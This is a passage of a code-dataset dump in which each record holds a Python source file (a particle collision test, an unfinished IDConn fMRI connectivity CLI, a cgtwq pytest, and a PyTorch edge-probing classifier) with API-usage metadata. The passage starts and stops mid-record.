"call"}, {"api_name": "tkinter.ttk", "line_number": 62, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 65, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 67, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 70, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 70, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 72, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 75, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 75, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 77, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 80, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 82, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 85, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 85, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 87, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 87, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 90, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 90, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 92, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 95, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 95, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 97, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 97, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 102, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 102, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 103, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scale", "line_number": 104, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 104, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 107, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 107, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 112, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 112, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 114, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 114, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scale", "line_number": 117, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 117, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 120, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 120, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 125, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 125, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 126, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 126, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 129, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 129, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 148, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 174, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 232, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 234, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 242, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 316, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 342, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 372, "usage_type": "call"}, {"api_name": "sketchbooks.SW.run_servo.compiling", "line_number": 372, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 378, "usage_type": "call"}]}
+{"seq_id": "89533733", "text": "# test1.py\n\nimport sys\nsys.path.insert(0, '../')\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle\nimport random\n\nimport disk.disk as disk\nimport event.event as ev\nimport system.system as sy\n\n# import matplotlib.animation as anim\n\ndisk.VX = 0.5\ndisk.VY = 0.5\n\nNoPart = 10\ncolors = ['red', 'blue', 'green', 'yellow', 'pink', 'magenta', 'cyan', 'orange', 'purple']\n\nwind = False\nSystem = sy.System(window = wind)\nfor i in range(NoPart):\n System.particles.append(disk.Disk(vx = disk.VX, vy = disk.VY, rad = 2, col = random.choice(colors), tag = str(i)))\n\nSystem.set_random_positions()\n\n# check_overlap() # Revisar 2.4.1\nSystem.check_overlap()\n\ncont = 0\nfor j in System.particles:\n # print(j)\n cont += 1\n j.obj = Circle((j.x, j.y), j.rad, color = j.col)\n\n\n# Grafica del Momentum\nfig, ax = plt.subplots()\n\n\nsim_time = 200000\nPtot = System.main_loop(sim_time)\n\n# 2.4.1 Grafica del Momentum Lineal\n# print(Ptot)\n# print(\"len =\", len(Ptot))\ntime = [i for i in range(0, len(Ptot))]\nax.plot(time, Ptot)\nax.grid()\nplt.show()\n\n\n\n\n################################################################################\n# ANIMACION with matplotlib.animation\n# fig2, ax2 = plt.subplots()\n# fig2.set_size_inches(20, 20)\n# fig2.patch.set_facecolor('xkcd:salmon')\n#\n# ax2.set_facecolor('xkcd:black')\n# ax2.set_aspect('equal')\n# ax2.set_xlim(0, 200)\n# ax2.set_ylim(0, 200)\n# ax2.set_title('Simulation Collition Particles')\n# plt.grid(True, color = 'w')\n#\n# ball, = plt.plot(x[0], y[0], 'ro')\n#\n# def animate(i):\n# ball.set_data(x[i], y[i])\n# return ball,\n#\n# myAnimation = anim.FuncAnimation(fig2, animate, frames = np.arange(0, len(x), 1), blit = True, repeat = True)\n#\n# plt.show()\n", "sub_path": "Collitions/tests/test1.py", "file_name": "test1.py", "file_ext": "py", "file_size_in_byte": 1718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "disk.disk.VX", "line_number": 17, "usage_type": "attribute"}, {"api_name": "disk.disk", "line_number": 17, "usage_type": "name"}, {"api_name": "disk.disk.VY", "line_number": 18, "usage_type": "attribute"}, {"api_name": "disk.disk", "line_number": 18, "usage_type": "name"}, {"api_name": "system.system.System", "line_number": 24, "usage_type": "call"}, {"api_name": "system.system", "line_number": 24, "usage_type": "name"}, {"api_name": "disk.disk.Disk", "line_number": 26, "usage_type": "call"}, {"api_name": "disk.disk", "line_number": 26, "usage_type": "name"}, {"api_name": "disk.disk.VX", "line_number": 26, "usage_type": "attribute"}, {"api_name": "disk.disk.VY", "line_number": 26, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.patches.Circle", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}]}
+{"seq_id": "628729484", "text": "#!/usr/bin/env python3\n\n\"\"\"\nPhys2bids is a python3 library meant to set physiological files in BIDS standard.\nIt was born for Acqknowledge files (BIOPAC), and at the moment it supports\n``.acq`` files and ``.txt`` files obtained by labchart (ADInstruments).\nIt requires python 3.6 or above, as well as the modules:\n- `numpy`\n- `matplotlib`\nIn order to process ``.acq`` files, it needs `bioread`, an excellent module\nthat can be found at `this link`_\nThe project is under development.\nAt the very moment, it assumes:\n- the input file is from one individual scan, not one session with multiple scans.\n.. _this link:\n https://github.com/uwmadison-chm/bioread\nCopyright 2019, The Phys2BIDS community.\nPlease scroll to bottom to read full license.\n\"\"\"\n\nimport datetime\nimport logging\nimport os\nimport sys\nimport argparse\nfrom copy import deepcopy\nfrom shutil import copy as cp\n\nimport numpy as np\n\nfrom idconn import io, _version\n\n# from idconn.cli.run import _get_parser\nfrom idconn.connectivity import build_networks\n\n# from idconn.networking import graph_measures\n# from idconn.data import\n# from idconn.statistics import\n\nfrom . import __version__\nfrom .due import due, Doi\n\nLGR = logging.getLogger(__name__)\nLGR.setLevel(logging.INFO)\n\n\ndef _get_parser():\n \"\"\"\n Parse command line inputs for this function.\n Returns\n -------\n parser.parse_args() : argparse dict\n Notes\n -----\n # Argument parser follow template provided by RalphyZ.\n # https://stackoverflow.com/a/43456577\n \"\"\"\n parser = argparse.ArgumentParser()\n optional = parser._action_groups.pop()\n required = parser.add_argument_group(\"Required Argument:\")\n required.add_argument(\n \"-dset\",\n \"--dataset\",\n dest=\"filename\",\n type=str,\n help=\"The path to the BIDS dataset containing fMRI \"\n \"data and fMRIPrep derivatives\",\n required=True,\n )\n optional.add_argument(\n \"-info\",\n \"--info\",\n dest=\"info\",\n action=\"store_true\",\n help=\"Only output info about the file, don't process. \"\n \"Default is to process.\",\n default=False,\n )\n optional.add_argument(\n \"-indir\",\n \"--input-dir\",\n dest=\"indir\",\n type=str,\n help=\"Folder containing input. \" \"Default is current folder.\",\n default=\".\",\n )\n optional.add_argument(\n \"-outdir\",\n \"--output-dir\",\n dest=\"outdir\",\n type=str,\n help=\"Folder where output should be placed. \"\n \"Default is current folder. \"\n 'If \"-heur\" is used, it\\'ll become '\n 'the site folder. Requires \"-sub\". '\n 'Optional to specify \"-ses\".',\n default=\".\",\n )\n optional.add_argument(\n \"-heur\",\n \"--heuristic\",\n dest=\"heur_file\",\n type=str,\n help=\"File containing heuristic, with or without \"\n \"extension. This file is needed in order to \"\n \"convert your input file to BIDS format! \"\n \"If no path is specified, it assumes the file is \"\n \"in the current folder. Edit the heur_ex.py file in \"\n \"heuristics folder.\",\n default=None,\n )\n optional.add_argument(\n \"-sub\",\n \"--subject\",\n dest=\"sub\",\n type=str,\n help='Specify alongside \"-heur\". Code of ' \"subject to process.\",\n default=None,\n )\n optional.add_argument(\n \"-ses\",\n \"--session\",\n dest=\"ses\",\n type=str,\n help='Specify alongside \"-heur\". Code of ' \"session to process.\",\n default=None,\n )\n optional.add_argument(\n \"-chtrig\",\n \"--channel-trigger\",\n dest=\"chtrig\",\n type=int,\n help=\"The column number of the trigger channel. \"\n \"Channel numbering starts with 1. \"\n \"Default is 0. If chtrig is left as zero phys2bids will \"\n \"perform an automatic trigger channel search by channel names.\",\n default=0,\n )\n optional.add_argument(\n \"-chsel\",\n \"--channel-selection\",\n dest=\"chsel\",\n nargs=\"*\",\n type=int,\n help=\"The column numbers of the channels to process. \"\n \"Default is to process all channels.\",\n default=None,\n )\n optional.add_argument(\n \"-ntp\",\n \"--numtps\",\n dest=\"num_timepoints_expected\",\n nargs=\"*\",\n type=int,\n help=\"Number of expected trigger timepoints (TRs). \"\n \"Default is None. Note: the estimation of beggining of \"\n \"neuroimaging acquisition cannot take place with this default. \"\n \"If you're running phys2bids on a multi-run recording, \"\n \"give a list of each expected ntp for each run.\",\n default=None,\n )\n optional.add_argument(\n \"-tr\",\n \"--tr\",\n dest=\"tr\",\n nargs=\"*\",\n type=float,\n help=\"TR of sequence in seconds. \"\n \"If you're running phys2bids on a multi-run recording, \"\n \"you can give a list of each expected ntp for each run, \"\n \"or just one TR if it is consistent throughout the session.\",\n default=None,\n )\n optional.add_argument(\n \"-thr\",\n \"--threshold\",\n dest=\"thr\",\n type=float,\n help=\"Threshold to use for trigger detection. \"\n 'If \"ntp\" and \"TR\" are specified, phys2bids '\n \"automatically computes a threshold to detect \"\n \"the triggers. Use this parameter to set it manually. \"\n \"This parameter is necessary for multi-run recordings. \",\n default=None,\n )\n optional.add_argument(\n \"-pad\",\n \"--padding\",\n dest=\"pad\",\n type=float,\n help=\"Padding in seconds used around a single run \"\n \"when separating multi-run session files. \"\n \"Default is 9 seconds.\",\n default=9,\n )\n optional.add_argument(\n \"-chnames\",\n \"--channel-names\",\n dest=\"ch_name\",\n nargs=\"*\",\n type=str,\n help=\"Column header (for json file output).\",\n default=[],\n )\n optional.add_argument(\n \"-yml\",\n \"--participant-yml\",\n dest=\"yml\",\n type=str,\n help=\"full path to file with info needed to generate \" \"participant.tsv file \",\n default=\"\",\n )\n optional.add_argument(\n \"-debug\",\n \"--debug\",\n dest=\"debug\",\n action=\"store_true\",\n help=\"Only print debugging info to log file. Default is False.\",\n default=False,\n )\n optional.add_argument(\n \"-quiet\",\n \"--quiet\",\n dest=\"quiet\",\n action=\"store_true\",\n help=\"Only print warnings to log file. Default is False.\",\n default=False,\n )\n optional.add_argument(\n \"-v\", \"--version\", action=\"version\", version=(\"%(prog)s \" + __version__)\n )\n\n parser._action_groups.append(optional)\n\n return parser\n\n\ndef print_summary(filename, ntp_expected, ntp_found, samp_freq, time_offset, outfile):\n \"\"\"\n Print a summary onscreen and in file with informations on the files.\n Parameters\n ----------\n dset: str\n Name of the input dataset of idconn.\n subjects: int\n Number of expected timepoints, as defined by user.\n ntp_found: int\n Number of timepoints found with the automatic process.\n samp_freq: float\n Frequency of sampling for the output file.\n time_offset: float\n Difference between beginning of file and first TR.\n outfile: str or path\n Fullpath to output file.\n Notes\n -----\n Outcome:\n summary: str\n Prints the summary on screen\n outfile: .log file\n File containing summary\n \"\"\"\n start_time = -time_offset\n summary = (\n f\"\\n------------------------------------------------\\n\"\n f\"Filename: {filename}\\n\"\n f\"\\n\"\n f\"Timepoints expected: {ntp_expected}\\n\"\n f\"Timepoints found: {ntp_found}\\n\"\n f\"Sampling Frequency: {samp_freq} Hz\\n\"\n f\"Sampling started at: {start_time:.4f} s\\n\"\n f\"Tip: Time 0 is the time of first trigger\\n\"\n f\"------------------------------------------------\\n\"\n )\n LGR.info(summary)\n utils.write_file(outfile, \".log\", summary)\n\n\n@due.dcite(\n Doi(\"10.1038/sdata.2016.44\"),\n path=\"phys2bids\",\n description=\"The BIDS specification\",\n cite_module=True,\n)\ndef idconn(\n filename,\n info=False,\n indir=\".\",\n outdir=\".\",\n heur_file=None,\n sub=None,\n ses=None,\n chtrig=0,\n chsel=None,\n num_timepoints_expected=None,\n tr=None,\n thr=None,\n pad=9,\n ch_name=[],\n yml=\"\",\n debug=False,\n quiet=False,\n):\n \"\"\"\n Run main workflow of IDConn.\n Runs the parser, builds statsmodel json, then reads in fmri data + mask + task timing,\n makes and saves connectivity matrices, computes graph measures, and imputs missing data.\n If only info is required,\n it returns a summary onscreen.\n Otherwise, it operates on the input to return a .tsv.gz file, possibly\n in BIDS format.\n Raises\n ------\n NotImplementedError\n If the file extension is not supported yet.\n \"\"\"\n # Check options to make them internally coherent pt. I\n # #!# This can probably be done while parsing?\n outdir = os.path.abspath(outdir)\n os.makedirs(outdir, exist_ok=True)\n logdir = os.path.join(outdir, \"logs\")\n os.makedirs(logdir, exist_ok=True)\n\n # Create logfile name\n basename = \"idconn_\"\n extension = \"tsv\"\n isotime = datetime.datetime.now().strftime(\"%Y-%m-%dT%H%M%S\")\n logname = os.path.join(logdir, (basename + isotime + \".\" + extension))\n\n # Set logging format\n log_formatter = logging.Formatter(\n \"%(asctime)s\\t%(name)-12s\\t%(levelname)-8s\\t%(message)s\",\n datefmt=\"%Y-%m-%dT%H:%M:%S\",\n )\n\n # Set up logging file and open it for writing\n log_handler = logging.FileHandler(logname)\n log_handler.setFormatter(log_formatter)\n sh = logging.StreamHandler()\n\n if quiet:\n logging.basicConfig(\n level=logging.WARNING,\n handlers=[log_handler, sh],\n format=\"%(levelname)-10s %(message)s\",\n )\n elif debug:\n logging.basicConfig(\n level=logging.DEBUG,\n handlers=[log_handler, sh],\n format=\"%(levelname)-10s %(message)s\",\n )\n else:\n logging.basicConfig(\n level=logging.INFO,\n handlers=[log_handler, sh],\n format=\"%(levelname)-10s %(message)s\",\n )\n\n version_number = _version.get_versions()[\"version\"]\n LGR.info(f\"Currently running IDConn version {version_number}\")\n LGR.info(f\"BIDS dset derivatives live at {deriv_dir}\")\n\n # Save call.sh\n arg_str = \" \".join(sys.argv[1:])\n call_str = f\"idconn {arg_str}\"\n f = open(os.path.join(logdir, \"call.sh\"), \"a\")\n f.write(f\"#!bin/bash \\n{call_str}\")\n f.close()\n\n ###########\n # Need parser to include name and desc of model\n ###########\n statsmodels_path = os.path.join(outdir, \"model-{name}_desc-{desc}_smdl.json\")\n LGR.info(f\"Creating BIDS Stats Models json @ {statsmodels_path}\")\n model = io.build_statsmodel_json(\n name,\n task,\n contrast,\n confounds,\n highpass,\n mask,\n conn_meas,\n graph_meas,\n exclude=None,\n outfile=statsmodels_path,\n )\n\n # How do I get subjects from the model? Use pybids!\n\n ###########\n # Need parser to include space and task name\n ###########\n assert exists(\n dset_dir\n ), \"Specified dataset doesn't exist:\\n{dset_dir} not found.\\n\\nPlease check the filepath.\"\n layout = bids.BIDSLayout(dset_dir, derivatives=True)\n subjects = layout.get(return_type=\"id\", target=\"subject\", suffix=\"bold\")\n sessions = layout.get(return_type=\"id\", target=\"session\", suffix=\"bold\")\n runs = layout.get(return_type=\"id\", target=\"session\", suffix=\"bold\")\n preproc_subjects = layout2.get(\n scope=\"fmriprep\",\n return_type=\"id\",\n target=\"subject\",\n task=task,\n space=space,\n desc=\"preproc\",\n suffix=\"bold\",\n )\n if len(subjects) != len(preproc_subjects):\n LGR.info(\n f\"{len(subjects)} subjects found in dset, only {len(preproc_subjects)} have preprocessed BOLD data. Pipeline is contniuing anyway, please double check preprocessed data if this doesn't seem right.\"\n )\n\n LGR.info(f\"Computing connectivity matrices using {atlas}\")\n for subject in subjects:\n LGR.info(f\"Subject {subject}\")\n for session in sessions:\n LGR.info(f\"Session {session}\")\n adj_matrix = estimate_connectivity(\n layout,\n subject,\n session,\n runs,\n connectivity_metric,\n space,\n atlas,\n confounds,\n )\n # if graph_measures:\n # for measure in graph_measures:\n # estimate_thresh\n # for threshold in bounds\n\n\ndef _main(argv=None):\n options = _get_parser().parse_args(argv)\n idconn(**vars(options))\n\n\nif __name__ == \"__main__\":\n _main(sys.argv[1:])\n\n\"\"\"\nCopyright 2019, The Phys2BIDS community.\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\nhttp://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n", "sub_path": "idconn/idconn.py", "file_name": "idconn.py", "file_ext": "py", "file_size_in_byte": 13694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 44, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path", "line_number": 319, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 321, "usage_type": "call"}, {"api_name": "os.path", "line_number": 321, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 322, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 327, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 327, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 328, "usage_type": "call"}, {"api_name": "os.path", "line_number": 328, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 331, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 337, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 339, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 342, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 343, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 348, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 349, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 354, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 355, "usage_type": "attribute"}, {"api_name": "idconn._version.get_versions", "line_number": 360, "usage_type": "call"}, {"api_name": "idconn._version", "line_number": 360, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 365, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 367, "usage_type": "call"}, {"api_name": "os.path", "line_number": 367, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 374, "usage_type": "call"}, {"api_name": "os.path", "line_number": 374, "usage_type": "attribute"}, {"api_name": "idconn.io.build_statsmodel_json", "line_number": 376, "usage_type": "call"}, {"api_name": "idconn.io", "line_number": 376, "usage_type": "name"}, {"api_name": "due.due.dcite", "line_number": 279, "usage_type": "call"}, {"api_name": "due.due", "line_number": 279, "usage_type": "name"}, {"api_name": "due.Doi", "line_number": 280, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 442, "usage_type": "attribute"}]}
+{"seq_id": "395049922", "text": "# -*- coding=UTF-8 -*-\n\"\"\"Test class `cgtwq.Entry`.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytest\n\nimport cgtwq\nfrom tests import util\n\n\n@pytest.fixture(name=\"entry\")\n@util.skip_if_not_logged_in\ndef _entry():\n return (\n cgtwq.Database(\"proj_sdktest\")\n .module(\"shot\")\n .filter(\n cgtwq.Field(\"shot.entity\") == \"SDKTEST_EP01_01_sc001\",\n cgtwq.Field(\"task.pipeline\") == \"合成\",\n )\n .to_entry()\n )\n\n\n@util.skip_if_not_logged_in\ndef test_entry_related(entry):\n assert isinstance(entry, cgtwq.Entry)\n result = entry.related()\n assert isinstance(result, cgtwq.Selection)\n assert len(result) > 1\n", "sub_path": "tests/test_entry.py", "file_name": "test_entry.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "cgtwq.Database", "line_number": 16, "usage_type": "call"}, {"api_name": "cgtwq.Field", "line_number": 19, "usage_type": "call"}, {"api_name": "cgtwq.Field", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "tests.util.skip_if_not_logged_in", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tests.util", "line_number": 13, "usage_type": "name"}, {"api_name": "cgtwq.Entry", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cgtwq.Selection", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tests.util.skip_if_not_logged_in", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tests.util", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "354529405", "text": "# Implementation of edge probing module.\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom ..tasks.edge_probing import EdgeProbingTask\nfrom .import modules\n\nfrom allennlp.modules.span_extractors import \\\n EndpointSpanExtractor, SelfAttentiveSpanExtractor\n\nfrom typing import Dict, Iterable, List\n\n\nclass EdgeClassifierModule(nn.Module):\n ''' Build edge classifier components as a sub-module.\n\n Use same classifier code as build_single_sentence_module,\n except instead of whole-sentence pooling we'll use span1 and span2 indices\n to extract span representations, and use these as input to the classifier.\n\n This works in the current form, but with some provisos:\n - Only considers the explicit set of spans in inputs; does not consider\n all other spans as negatives. (So, this won't work for argument\n _identification_ yet.)\n\n TODO: consider alternate span-pooling operators: max or mean-pooling,\n or SegRNN.\n\n TODO: add span-expansion to negatives, one of the following modes:\n - all-spans (either span1 or span2), treating not-seen as negative\n - all-tokens (assuming span1 and span2 are length-1), e.g. for\n dependency parsing\n - batch-negative (pairwise among spans seen in batch, where not-seen\n are negative)\n '''\n\n def _make_span_extractor(self):\n if self.span_pooling == \"attn\":\n return SelfAttentiveSpanExtractor(self.proj_dim)\n else:\n return EndpointSpanExtractor(self.proj_dim,\n combination=self.span_pooling)\n\n def _make_cnn_layer(self, d_inp):\n \"\"\"Make a CNN layer as a projection of local context.\n\n CNN maps [batch_size, max_len, d_inp]\n to [batch_size, max_len, proj_dim] with no change in length.\n \"\"\"\n k = 1 + 2 * self.cnn_context\n padding = self.cnn_context\n return nn.Conv1d(d_inp, self.proj_dim, kernel_size=k,\n stride=1, padding=padding, dilation=1,\n groups=1, bias=True)\n\n def __init__(self, task, d_inp: int, task_params):\n super(EdgeClassifierModule, self).__init__()\n # Set config options needed for forward pass.\n self.loss_type = task_params['cls_loss_fn']\n self.span_pooling = task_params['cls_span_pooling']\n self.cnn_context = task_params['edgeprobe_cnn_context']\n self.is_symmetric = task.is_symmetric\n self.single_sided = task.single_sided\n\n self.proj_dim = task_params['d_hid']\n # Separate projection for span1, span2.\n # Convolution allows using local context outside the span, with\n # cnn_context = 0 behaving as a per-word linear layer.\n # Use these to reduce dimensionality in case we're enumerating a lot of\n # spans - we want to do this *before* extracting spans for greatest\n # efficiency.\n self.proj1 = self._make_cnn_layer(d_inp)\n if self.is_symmetric or self.single_sided:\n # Use None as dummy padding for readability,\n # so that we can index projs[1] and projs[2]\n self.projs = [None, self.proj1, self.proj1]\n else:\n # Separate params for span2\n self.proj2 = self._make_cnn_layer(d_inp)\n self.projs = [None, self.proj1, self.proj2]\n\n # Span extractor, shared for both span1 and span2.\n self.span_extractor1 = self._make_span_extractor()\n if self.is_symmetric or self.single_sided:\n self.span_extractors = [None, self.span_extractor1, self.span_extractor1]\n else:\n self.span_extractor2 = self._make_span_extractor()\n self.span_extractors = [None, self.span_extractor1, self.span_extractor2]\n\n # Classifier gets concatenated projections of span1, span2\n clf_input_dim = self.span_extractors[1].get_output_dim()\n if not self.single_sided:\n clf_input_dim += self.span_extractors[2].get_output_dim()\n self.classifier = modules.Classifier.from_params(clf_input_dim,\n task.n_classes,\n task_params)\n\n def forward(self, batch: Dict,\n sent_embs: torch.Tensor,\n sent_mask: torch.Tensor,\n task: EdgeProbingTask,\n predict: bool) -> Dict:\n \"\"\" Run forward pass.\n\n Expects batch to have the following entries:\n 'batch1' : [batch_size, max_len, ??]\n 'labels' : [batch_size, num_targets] of label indices\n 'span1s' : [batch_size, num_targets, 2] of spans\n 'span2s' : [batch_size, num_targets, 2] of spans\n\n 'labels', 'span1s', and 'span2s' are padded with -1 along second\n (num_targets) dimension.\n\n Args:\n batch: dict(str -> Tensor) with entries described above.\n sent_embs: [batch_size, max_len, repr_dim] Tensor\n sent_mask: [batch_size, max_len, 1] Tensor of {0,1}\n task: EdgeProbingTask\n predict: whether or not to generate predictions\n\n Returns:\n out: dict(str -> Tensor)\n \"\"\"\n out = {}\n\n batch_size = sent_embs.shape[0]\n out['n_inputs'] = batch_size\n\n # Apply projection CNN layer for each span.\n sent_embs_t = sent_embs.transpose(1, 2) # needed for CNN layer\n se_proj1 = self.projs[1](sent_embs_t).transpose(2, 1).contiguous()\n if not self.single_sided:\n se_proj2 = self.projs[2](sent_embs_t).transpose(2, 1).contiguous()\n\n # Span extraction.\n span_mask = (batch['span1s'][:, :, 0] != -1) # [batch_size, num_targets] bool\n out['mask'] = span_mask\n total_num_targets = span_mask.sum()\n out['n_targets'] = total_num_targets\n out['n_exs'] = total_num_targets # used by trainer.py\n\n _kw = dict(sequence_mask=sent_mask.long(),\n span_indices_mask=span_mask.long())\n # span1_emb and span2_emb are [batch_size, num_targets, span_repr_dim]\n span1_emb = self.span_extractors[1](se_proj1, batch['span1s'], **_kw)\n if not self.single_sided:\n span2_emb = self.span_extractors[2](se_proj2, batch['span2s'], **_kw)\n span_emb = torch.cat([span1_emb, span2_emb], dim=2)\n else:\n span_emb = span1_emb\n\n # [batch_size, num_targets, n_classes]\n logits = self.classifier(span_emb)\n out['logits'] = logits\n\n # Compute loss if requested.\n if 'labels' in batch:\n # Labels is [batch_size, num_targets, n_classes],\n # with k-hot encoding provided by AllenNLP's MultiLabelField.\n # Flatten to [total_num_targets, ...] first.\n out['loss'] = self.compute_loss(logits[span_mask],\n batch['labels'][span_mask],\n task)\n\n if predict:\n # Return preds as a list.\n preds = self.get_predictions(logits)\n out['preds'] = list(self.unbind_predictions(preds, span_mask))\n\n return out\n\n def unbind_predictions(self, preds: torch.Tensor,\n masks: torch.Tensor) -> Iterable[np.ndarray]:\n \"\"\" Unpack preds to varying-length numpy arrays.\n\n Args:\n preds: [batch_size, num_targets, ...]\n masks: [batch_size, num_targets] boolean mask\n\n Yields:\n np.ndarray for each row of preds, selected by the corresponding row\n of span_mask.\n \"\"\"\n preds = preds.detach().cpu()\n masks = masks.detach().cpu()\n for pred, mask in zip(torch.unbind(preds, dim=0),\n torch.unbind(masks, dim=0)):\n yield pred[mask].numpy() # only non-masked predictions\n\n def get_predictions(self, logits: torch.Tensor):\n \"\"\"Return class probabilities, same shape as logits.\n\n Args:\n logits: [batch_size, num_targets, n_classes]\n\n Returns:\n probs: [batch_size, num_targets, n_classes]\n \"\"\"\n if self.loss_type == 'sigmoid':\n return torch.sigmoid(logits)\n else:\n raise 